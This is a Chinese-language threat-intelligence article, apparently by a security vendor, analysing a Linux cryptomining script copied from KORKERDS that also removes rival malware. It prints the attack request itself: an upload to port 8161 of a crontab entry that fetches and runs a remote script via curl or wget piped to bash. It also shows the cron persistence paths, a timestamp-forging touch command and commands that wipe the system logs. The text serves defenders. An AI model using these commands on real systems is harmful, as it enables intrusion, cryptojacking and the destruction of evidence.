惊,这个行业“抄袭”竟然多如牛毛!
近期,翟天临被学术打假事件持续发酵,硕士论文《“英雄”本是“普通人”——试论表演创作中的英雄形象与人性》也被指存在抄袭演员陈坤的本科论文。“抄袭”是令人深恶痛绝的,但在安全圈却屡见不鲜,很多新病毒都在功能、攻击手法上借鉴知名病毒,此类“抄袭”可谓多如牛毛。
近日,亚信安全就侦测到一个会从某网域下载二进制文件的新病毒脚本,经过一系列调查分析发现,该脚本会删除一些已知的Linux恶意程序、挖矿程序以及一些连上某些挖矿服务的联机。除此之外,该脚本抄袭了Xbash的功能和KORKERDS恶意程序,还会安装一个挖矿恶意程序,也会将自己植入系统并在crontab当中设定排程以便在重启后继续执行,并且防止遭到删除。
【侦测到会从某网域下载档案的新脚本】
在发现这个会下载二进制文件的新脚本之后,亚信安全专家进一步查看了2018年11月所搜集到的某个KORKERDS样本的代码,竟发现两者几乎完全相同,只是新增及删除的少数部分。与KORKERDS相比,这个新发现的脚本并不会移除系统上已安装的安全产品,也不会在系统上安装Rootkit,反而会将KORKERDS恶意挖矿程序和Rootkit清除。
【新脚本抄袭自KORKERDS但却会杀掉KORKERDS的“kworkerds”执行程序】
【新脚本也会移除KORKERDS的Rootkit组件】
新脚本会下载一个修改过的XMR-Stak虚拟加密货币挖矿程序(亚信安全命名为Coinminer.Linux.MALXMR.UWEIU)以及一个通用Stratum矿池挖矿程序,可支持CPU及AMD GPU和NVIDIA GPU挖矿,专门开采Cryptonight算法的货币。我们分析了一下感染案例发现,其最初是从某些IP摄影机和网站服务开始感染,黑客试图经由TCP连接端口8161上传一个crontab排程文件:
PUT /fileserver/vMROB4ZhfLTljleL HTTP/1.1Host: xxx.xxx.127.221:8161Accept: */*Content-Length: 105Content-Type: application/x-www-form-urlencoded*/10 * * * * root (curl -fsSL hxxp://yxarsh.shop/1.jpg||wget -q -O- hxxp://yxarsh.shop/1.jpg)|bash -sh##
接着,crontab会让系统下载并执行指令集脚本,并启用三项黑客所需的功能:
1. 功能B会删除先前系统上已安装的恶意程序、挖矿程序以及另一个搭配的恶意程序(亚信安全命名为SH.MALXMR.UWEIU)所用到的相关服务。此外,也会建立新的目录、档案,并终止所有连上其IP位址的执行程序。
【挖矿程序脚本会删除系统上先前安装的恶意程序、挖矿程序与相关服务】
2. 功能D会从“hxxp://yxarsh.shop/64”下载挖矿程序并加以执行。
3. 功能C会从“hxxp://yxarsh.shop/0”下载一个脚本,并储存成“/usr/local/bin/dns”文件,然后建立一个新的crontab排程工作在凌晨1点时呼叫这个脚本。此外也会下载“hxxp://yxarsh.shop/1.jpg”文件并将它放入不同的crontab当中:
/etc/cron.d/root/var/spool/cron/root/etc/cron.d/apache/var/spool/cron/crontabs/root/etc/cron.hourly/oanacroner/etc/cron.daily/oanacroner/etc/cron.monthly/oanacroner
这些新的文件时间戳记已经过修改,使其上次存取时间与“/bin/sh”文件相同。
touch -acmr /bin/sh /etc/cron.hourly/oanacroner
接着恶意程序将自己植入系统内以便能在重启后继续执行并防止遭到删除,此外也将一些记录文件内容清除为0:
echo 0>/var/spool/mail/rootecho 0>/var/log/wtmpecho 0>/var/log/secureecho 0>/var/log/cron
相较于KORKERDS样本,新的脚本将感染程序简化成下载并执行文件,接着将挖矿程序安装至系统。若仔细分析其自我散布代码可发现大部分都抄袭自KORKERDS脚本,而该脚本(Base64编码)目前还可从“hxxps://pastebin.com/u/SYSTEAM”下载。我们留意到“PUT URL /fileserver/vMROB4ZhfLTljleL”这道指令与实际的crontab之间缺乏连接。KORKERDS的作法是直接储存crontab,而新的脚本却是只建立一个crontab来下载所有的代码和挖矿程序。
【该脚本自我散布的代码抄袭自KORKERDS的Python脚本】
总结:虽然,这个脚本并非第一个会清除系统上其他恶意程序的恶意程序,但却从未见过如此大量清除Linux恶意程序的案例。清除其他竞争对手的恶意程序,只是网络犯罪集团提高其获利的手段之一。企业只要确保其系统皆随时安装厂商最新的修补更新,就能防范各种不断演进的攻击。不论是使用CPU或GPU资源的虚拟加密货币挖矿恶意程序,都会让系统变慢。IT系统管理员可采用多层式防护来即时侦测、防范、解决可能感染的恶意程序,如挖矿程序。此外,还能防止恶意程序影响网络与企业日常运营。
行业热点:
了解亚信安全,请点击“阅读原文”